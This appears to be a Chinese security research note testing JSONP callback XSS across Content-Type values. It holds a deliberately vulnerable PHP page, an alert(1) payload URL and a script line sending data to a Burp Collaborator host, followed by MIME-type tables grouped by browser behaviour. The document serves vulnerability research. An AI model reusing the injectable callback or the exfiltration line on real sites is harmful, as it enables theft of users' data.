测试代码
// http://10.211.55.8/jsonx.php?callback=%3Cscript%3Ealert(1)%3C/script%3E&content_type=text/vnd.wap.wml
<?php
echo "<script>function test(cc){location='http://m2pybxdae******9m4fff8dwlnrdf2.burpcollaborator.net/payload='+cc;}</script>";
$content_type=$_GET['content_type'];
//print "Use Content-type '".$content_type."'\n";
header("X-XSS-Protection: 0;");
header("Content-Type: ".$content_type);
$callback = $_GET['callback'];
print $callback . '({"id" : "1","name" : "Sariel.D"});';
?>
测试结果
- 支持xss
列表
Name | Template | Reference |
---|---|---|
html | text/html | [W3C][Robin_Berjon] |
效果
- 返回内容
列表
Name | Template | Reference |
---|---|---|
ecmascript | application/ecmascript | [RFC4329] |
javascript | application/javascript | [RFC4329] |
json | application/json | [RFC8259] |
1d-interleaved-parityfec | text/1d-interleaved-parityfec | [RFC6015] |
cache-manifest | text/cache-manifest | [W3C][Robin_Berjon] |
css | text/css | [RFC2318] |
csv-schema | text/csv-schema | [National_Archives_UK][David_Underdown] |
dns | text/dns | [RFC4027] |
ecmascript - OBSOLETED in favor of application/ecmascript | text/ecmascript | [RFC4329] |
encaprtp | text/encaprtp | [RFC6849] |
example | text/example | [RFC4735] |
fwdred | text/fwdred | [RFC6354] |
grammar-ref-list | text/grammar-ref-list | [RFC6787] |
javascript - OBSOLETED in favor of application/javascript | text/javascript | [RFC4329] |
jcr-cnd | text/jcr-cnd | [Peeter_Piegaze] |
markdown | text/markdown | [RFC7763] |
n3 | text/n3 | [W3C][Eric_Prudhommeaux] |
parameters | text/parameters | [RFC7826] |
provenance-notation | text/provenance-notation | [W3C][Ivan_Herman] |
prs.fallenstein.rst | text/prs.fallenstein.rst | [Benja_Fallenstein] |
prs.lines.tag | text/prs.lines.tag | [Benja_Fallenstein] |
text/prs.prop.logic | text/prs.prop.logic | [Hans-Dieter_A._Hiep] |
raptorfec | text/raptorfec | [RFC6682] |
RED | text/RED | [RFC4102] |
rfc822-headers | text/rfc822-headers | [RFC6522] |
rtp-enc-aescm128 | text/rtp-enc-aescm128 | [_3GPP] |
rtploopback | text/rtploopback | [RFC6849] |
rtx | text/rtx | [RFC4588] |
sgml | text/sgml | [RFC1874] |
strings | text/strings | [IEEE-ISTO-PWG-PPP] |
t140 | text/t140 | [RFC4103] |
troff | text/troff | [RFC4263] |
turtle | text/turtle | [W3C][Eric_Prudhommeaux] |
ulpfec | text/ulpfec | [RFC5109] |
uri-list | text/uri-list | [RFC2483] |
vnd.a | text/vnd.a | [Regis_Dehoux] |
vnd.abc | text/vnd.abc | [Steve_Allen] |
vnd.ascii-art | text/vnd.ascii-art | [Kim_Scarborough] |
vnd.curl | text/vnd.curl | [Robert_Byrnes] |
vnd.debian.copyright | text/vnd.debian.copyright | [Charles_Plessy] |
vnd.DMClientScript | text/vnd.DMClientScript | [Dan_Bradley] |
vnd.dvb.subtitle | text/vnd.dvb.subtitle | [Peter_Siebert][Michael_Lagally] |
vnd.esmertec.theme-descriptor | text/vnd.esmertec.theme-descriptor | [Stefan_Eilemann] |
vnd.fly | text/vnd.fly | [John-Mark_Gurney] |
vnd.fmi.flexstor | text/vnd.fmi.flexstor | [John-Mark_Gurney] |
vnd.graphviz | text/vnd.graphviz | [John_Ellson] |
vnd.hgl | text/vnd.hgl | [Heungsub_Lee] |
vnd.in3d.3dml | text/vnd.in3d.3dml | [Michael_Powers] |
vnd.in3d.spot | text/vnd.in3d.spot | [Michael_Powers] |
vnd.IPTC.NewsML | text/vnd.IPTC.NewsML | [IPTC] |
vnd.IPTC.NITF | text/vnd.IPTC.NITF | [IPTC] |
vnd.latex-z | text/vnd.latex-z | [Mikusiak_Lubos] |
vnd.motorola.reflex | text/vnd.motorola.reflex | [Mark_Patton] |
vnd.ms-mediapackage | text/vnd.ms-mediapackage | [Jan_Nelson] |
vnd.net2phone.commcenter.command | text/vnd.net2phone.commcenter.command | [Feiyu_Xie] |
vnd.senx.warpscript | text/vnd.senx.warpscript | [Pierre_Papin] |
vnd.si.uricatalogue - OBSOLETED by request | text/vnd.si.uricatalogue | [Nicholas_Parks_Young] |
vnd.trolltech.linguist | text/vnd.trolltech.linguist | [David_Lee_Lambert] |
vnd.wap.si | text/vnd.wap.si | [WAP-Forum] |
vnd.wap.wml | text/vnd.wap.wml | [Peter_Stark] |
vnd.wap.wmlscript | text/vnd.wap.wmlscript | [Peter_Stark] |
效果
- 返回内容但浏览器尝试解析导致异常
列表
Name | Template | Reference |
---|---|---|
ogg | application/ogg | [RFC5334][RFC7845] |
application/pdf | [RFC8118] | |
xml | application/xml | [RFC7303] |
xml | text/xml | [RFC7303] |
mp4 | audio/mp4 | [RFC4337][RFC6381] |
mpeg | audio/mpeg | [RFC3003] |
ogg | audio/ogg | [RFC5334][RFC7845] |
bmp | image/bmp | [RFC7903] |
png | image/png | [Glenn_Randers-Pehrson] |
vnd.microsoft.icon | image/vnd.microsoft.icon | [Simon_Butcher] |
x-mixed-replace | multipart/x-mixed-replace | [W3C][Robin_Berjon] |
效果